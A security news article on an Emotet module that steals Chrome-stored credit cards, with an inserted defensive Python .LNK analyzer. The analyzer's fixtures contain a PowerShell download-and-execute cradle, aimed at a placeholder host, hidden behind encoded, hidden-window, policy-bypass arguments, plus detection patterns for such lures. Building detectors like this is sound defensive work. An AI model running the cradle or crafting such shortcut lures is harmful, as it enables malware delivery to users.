Google Chrome users’ credit card information is being stolen by a new Emotet variant.
The notorious Emotet malware has been updated to include a new module that steals credit card information stored in the Chrome web browser.
According to enterprise security company Proofpoint, which discovered the credit card stealer on June 6, the component is capable of exfiltrating the stolen data to several remote command-and-control (C2) servers.
The news comes amid a surge in Emotet activity since the botnet was revived late last year after a 10-month hiatus caused by a coordinated law enforcement operation that took down the group’s attack infrastructure in January 2021.
Emotet is a complex, self-propagating, and modular trojan that’s distributed via email campaigns and used as a loader for other payloads such as ransomware. It’s attributed to a threat actor tracked as TA542 (aka Mummy Spider or Gold Crestwood).
According to Check Point, Emotet is still the most prevalent malware, affecting 6% of organizations globally, followed by Formbook and Agent Tesla. The malware’s operators are experimenting with new delivery methods such as OneDrive URLs and PowerShell commands embedded in .LNK attachments to circumvent Microsoft’s macro restrictions.
The steady rise in Emotet-related threats is further evidenced by the volume of phishing emails, which often hijack existing correspondence: it increased from 3,000 in February 2022 to approximately 30,000 in March as part of a mass-scale spam campaign targeting organizations in various countries.
ESET stated that Emotet activity “moved to a higher gear” in March and April 2022, claiming that detections increased 100-fold in the first four months of the year compared to the preceding period from September to December 2021.
Japan, Italy, and Mexico have been regular targets since the botnet’s revival, according to the Slovak cybersecurity firm, with the largest wave occurring on March 16, 2022.
“The current Emotet LNK and XLL campaigns were substantially smaller than those disseminated via hacked DOC files seen in March,” stated Dušan Lacika, a senior detection engineer at ESET.
“This shows that the botnet’s controllers are only utilizing a small portion of the botnet’s capacity while experimenting with new distribution routes that could replace the VBA macros, which are currently disabled by default.”
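As an added example, not code from the article or from any of the vendors it cites, the following Python shows what a defender can do with one of the .LNK lures mentioned above: it parses the ShellLinkHeader and StringData sections as laid out in MS-SHLLINK, decodes a PowerShell -EncodedCommand blob if one is present, and flags the indicators typical of shortcut lures (PowerShell target, hidden window, execution-policy bypass, remote download). The two .lnk byte strings, the PowerShell payload string and the host name example.invalid are constructed here as fixtures, not real Emotet samples. The fixture builder writes only the RelativePath and Arguments fields; the parser also skips LinkTargetIDList and LinkInfo, so it works on real shortcuts that carry those sections.

```python
import base64
import binascii
import re
import struct

# ShellLinkHeader constants (MS-SHLLINK section 2.1).
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window minimized

# LinkFlags bits (MS-SHLLINK section 2.1.1) that this parser acts on.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80

# StringData sections appear in this fixed order when their flag is set (section 2.4).
STRING_DATA = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
               (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
               (HAS_ICON_LOCATION, "icon_location")]


def parse_lnk(data: bytes) -> dict:
    """Validate the header, skip IDList/LinkInfo, and return ShowCommand plus StringData."""
    try:
        header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
        if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
            raise ValueError("not a Shell Link: bad HeaderSize or CLSID")
        show_command, = struct.unpack_from("<I", data, 60)  # after FileSize and IconIndex
        off = LNK_HEADER_SIZE
        if flags & HAS_LINK_TARGET_ID_LIST:       # uint16 size, then the item IDs
            idlist_size, = struct.unpack_from("<H", data, off)
            off += 2 + idlist_size
        if flags & HAS_LINK_INFO:                 # uint32 size that includes itself
            info_size, = struct.unpack_from("<I", data, off)
            off += info_size
        info = {"flags": flags, "show_command": show_command}
        for bit, name in STRING_DATA:
            if not flags & bit:
                continue
            count, = struct.unpack_from("<H", data, off)  # CountCharacters, no terminator
            off += 2
            width = 2 if flags & IS_UNICODE else 1
            if len(data) < off + width * count:
                raise ValueError(f"truncated StringData field {name}")
            raw = data[off:off + width * count]
            off += width * count
            info[name] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", errors="replace")
        return info
    except struct.error as exc:
        raise ValueError(f"truncated Shell Link: {exc}") from None


# Command-line heuristics; each match yields a human-readable label.
ARG_INDICATORS = [
    (re.compile(r"powershell|pwsh", re.I), "invokes PowerShell"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I), "encoded command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"\biex\b|invoke-expression|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
     "downloads or dynamically executes code"),
    (re.compile(r"\b(?:mshta|regsvr32|rundll32|wscript|cscript|certutil)\b", re.I), "LOLBin"),
]
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(arguments: str):
    """PowerShell -EncodedCommand is base64 over UTF-16LE; return the script or None."""
    m = ENCODED_RE.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def assess_lnk(data: bytes) -> list:
    """Return the list of indicator labels that fire on a shortcut's target and arguments."""
    info = parse_lnk(data)
    command_line = " ".join(info.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
    decoded = decode_encoded_command(info.get("arguments", ""))
    haystack = command_line + ("\n" + decoded if decoded else "")  # scan the decoded script too
    findings = [label for pattern, label in ARG_INDICATORS if pattern.search(haystack)]
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand keeps window minimized")
    return findings


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Constructed fixture: a minimal Unicode .lnk carrying only RelativePath and Arguments."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


# Constructed fixtures (not real Emotet samples); example.invalid is a placeholder host.
PAYLOAD_PS = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/e.txt')"
ENCODED = base64.b64encode(PAYLOAD_PS.encode("utf-16-le")).decode("ascii")
MALICIOUS_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                          f"-w hidden -ep bypass -enc {ENCODED}", show_command=SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk(r"..\..\Program Files\Example\notes.exe", "--open report.txt")

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(label, assess_lnk(blob) or "no indicators")
```

The heuristics are deliberately string-based so they also apply to the command line a mail gateway or EDR records when the shortcut is launched; on a real sample, parse_lnk will skip the LinkTargetIDList and LinkInfo sections that Windows writes, and decode_encoded_command exposes the script that would otherwise hide behind the base64 blob.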
In a related development, researchers from CyberArk disclosed a technique for extracting plaintext credentials directly from the memory of Chromium-based web browsers.
“Credential data is kept in cleartext format in Chrome’s RAM,” stated CyberArk’s Zeev Ben Porat. “An attacker can induce the browser to load all the passwords stored in the password manager into memory, in addition to data that is dynamically entered when signing into certain web apps.”
This includes cookie-related data such as session cookies, which an attacker could extract and replay to hijack users’ accounts even when they are protected by multi-factor authentication.